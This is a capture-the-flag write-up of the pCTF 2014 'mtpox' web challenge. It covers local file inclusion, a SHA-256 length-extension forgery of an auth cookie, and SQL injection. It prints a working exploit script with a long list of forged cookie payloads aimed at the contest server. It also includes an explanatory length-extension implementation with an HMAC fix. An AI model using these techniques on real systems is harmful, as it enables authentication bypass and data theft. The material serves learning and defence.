int $0x80

pCTF 2014 mtpox writeup

cd80 2014.04.13 03:27
Creative Commons License

I solved this problem together with our team's web hacker rubiya ( http://blog.naver.com/withrubiya ).

Opening the site shows this main page,

          <li><a href="/index.php?page=index">Index</a></li>
          <li><a href="/index.php?page=about">About</a></li>
          <li><a href="#">PlaidCoins (under maintenance)</a></li>
          <li><a href="#">PlaidCards (under maintenance)</a></li>
          <li><a href="/admin.php">Admin</a></li>

and that is how the menu moves between pages.

Supplying index.php?page=admin.php here

lets you read the source like this.

Analyzing the source:

on the first visit $_COOKIE['auth'] is not set, so

the first place to look is the first else branch.

  else {
    $auth = false;
    $s = serialize($auth);
    setcookie("auth", $s);
    setcookie("hsh", hash("sha256", $SECRET . strrev($s)));
  } 

It initializes $_COOKIE['auth'] to "b:0;"

and $_COOKIE['hsh'] to hash("sha256", $SECRET . strrev($s)).

rubiya took one look and said it seemed to be a length extension attack,

and after analyzing it, attacking with length extension looked like it would work, so I wrote an exploit.

To make it easier, I used hashpump to generate the payloads automatically.

hash = "967ca6fa9eacfe716cd74db1b1db85800e451ca85d29bd27782832b9faa16ae1"

payloads = """
b%3A1%3B%C8%01%00%00%00%00%80b%3A0%3B
b%3A1%3B%C0%01%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%B8%01%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%B0%01%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%A8%01%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%A0%01%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%98%01%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%90%01%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%88%01%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%80%01%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3Bx%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3Bp%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3Bh%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%60%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3BX%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3BP%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3BH%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%40%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B8%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B0%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%28%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%20%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%18%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%10%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%08%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%00%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%F8%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%F0%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%E8%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%E0%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%D8%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%D0%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%C8%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%C0%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%B8%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%B0%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%A8%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%A0%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%98%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%90%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%88%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3Bx%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3Bp%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3Bh%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%60%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3BX%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3BP%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3BH%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%40%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B8%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B0%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
b%3A1%3B%28%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80b%3A0%3B
"""
payloads = payloads.split("\n")  # the triple-quoted string starts and ends with a newline, so payloads[0] and payloads[-1] are ""

import urllib2
for i in range(0, len(payloads)):
    req = urllib2.Request("http://54.211.6.40/admin.php")
    cur = payloads[i]
    # the server-issued hsh stays the same; only the extended auth cookie changes per candidate length
    req.add_header("Cookie", "hsh="+hash+";auth="+cur+";")
    data = urllib2.urlopen(req)

    data = data.read()
    print "key length: %d [ %s ]"%(i, data)
    # the admin page answers "Sorry, not authorized" unless the (auth, hsh) pair verifies
    if data.find("Sorry, not authorized") == -1:
        print "Found key length: %d" % i
        print "Found payload : %s" % payloads[i]
        print "hash : %s" % hash
        break
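To show why the check in the leaked source is forgeable and what replaces it, here is an added example (not the writeup's or hashpump's code; Python 3, standard library only). It assumes admin.php recomputes hash("sha256", $SECRET . strrev($_COOKIE['auth'])) and compares it with $_COOKIE['hsh'], as the setcookie code implies; the secret value is constructed, and with an 8-byte secret forge_cookie() regenerates the 46th payload in the list above.

```python
import hashlib, hmac, struct, urllib.parse
MASK = 0xFFFFFFFF
def _rotr(x, n): return ((x >> n) | (x << (32 - n))) & MASK
def _icbrt(x):  # exact integer cube root, used to derive the SHA-256 round constants K
    c = int(round(x ** (1 / 3)))
    while c ** 3 > x: c -= 1
    while (c + 1) ** 3 <= x: c += 1
    return c
_PRIMES = [p for p in range(2, 312) if all(p % q for q in range(2, int(p ** 0.5) + 1))]
K = [_icbrt(p << 96) & MASK for p in _PRIMES[:64]]  # K[i] = floor(frac(cbrt(prime_i)) * 2^32)
def _compress(state, block):  # one SHA-256 compression of a 64-byte block into the 8-word state
    w = list(struct.unpack(">16L", block))
    for i in range(16, 64):
        s0 = _rotr(w[i-15], 7) ^ _rotr(w[i-15], 18) ^ (w[i-15] >> 3)
        s1 = _rotr(w[i-2], 17) ^ _rotr(w[i-2], 19) ^ (w[i-2] >> 10)
        w.append((w[i-16] + s0 + w[i-7] + s1) & MASK)
    a, b, c, d, e, f, g, h = state
    for i in range(64):
        t1 = (h + (_rotr(e, 6) ^ _rotr(e, 11) ^ _rotr(e, 25)) + ((e & f) ^ (~e & g)) + K[i] + w[i]) & MASK
        t2 = ((_rotr(a, 2) ^ _rotr(a, 13) ^ _rotr(a, 22)) + ((a & b) ^ (a & c) ^ (b & c))) & MASK
        a, b, c, d, e, f, g, h = (t1 + t2) & MASK, a, b, c, (d + t1) & MASK, e, f, g
    return [(x + y) & MASK for x, y in zip(state, (a, b, c, d, e, f, g, h))]

def sha256_pad(msg_len):  # what SHA-256 appends to a msg_len-byte message: 0x80, zeros, 64-bit bit count
    return b"\x80" + b"\x00" * ((55 - msg_len) % 64) + struct.pack(">Q", msg_len * 8)

def sha256_extend(digest_hex, prefix_len, suffix):
    # sha256(prefix + sha256_pad(prefix_len) + suffix) from sha256(prefix) alone: the digest is
    # the internal state after the padded prefix, so compression simply resumes from it.
    state = list(struct.unpack(">8L", bytes.fromhex(digest_hex)))
    total = prefix_len + len(sha256_pad(prefix_len)) + len(suffix)
    data = suffix + sha256_pad(total)
    for i in range(0, len(data), 64):
        state = _compress(state, data[i:i + 64])
    return struct.pack(">8L", *state).hex()

def forge_cookie(hsh, secret_len, old=b"b:0;", new=b"b:1;"):
    # Forged (auth, hsh) for the check hsh == sha256(SECRET . strrev(auth)). The server hashes
    # SECRET + strrev(auth), so auth is assembled reversed: new + reversed glue padding + old.
    glue = sha256_pad(secret_len + len(old))
    return new + glue[::-1] + old, sha256_extend(hsh, secret_len + len(old), new[::-1])

def check_hmac(secret, auth, tag):  # the fix: an HMAC tag cannot be extended; compare in constant time
    return hmac.compare_digest(hmac.new(secret, auth, hashlib.sha256).hexdigest(), tag)

def demo(secret=b"s3cr3tk3"):  # constructed 8-byte secret, the length the writeup's postscript settles on
    issued = hashlib.sha256(secret + b"b:0;"[::-1]).hexdigest()           # what the first visit sets
    auth, forged = forge_cookie(issued, len(secret))
    accepted = hashlib.sha256(secret + auth[::-1]).hexdigest() == forged    # the vulnerable check
    return urllib.parse.quote(auth), accepted, check_hmac(secret, auth, forged)
```

demo() returns the URL-encoded forged auth cookie, whether the sha256(SECRET . strrev(auth)) check accepts it (it does, for any secret length), and whether the HMAC check accepts it (it does not).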

 

 

 

This showed that the salt used in the sha256 is 46 characters long,

and having the payload and hash, all that remains is to set them in the cookies.

After setting them and opening the admin page

there is this form, whose action points to a page that does not exist.

But the source file obtained earlier through LFI contains the code that handles this form.

Doing SQL injection there to get the table and column names,

the table name was plaidcoin_wallets

and the columns were id and coins.

Simply selecting id returned the key.

 

 


=======================================================================


There is one mistake in this writeup.

When generating the exploit I definitely did key lengths 1~54 in order, but it seems I fed them into the exploit above in reverse.

I am not sure why, but where the solution above says the salt length is 46,

it is actually 54 - 46, that is, 8 characters.

Looking at other writeups after the contest, the about page had a hint that the salt length is 8.
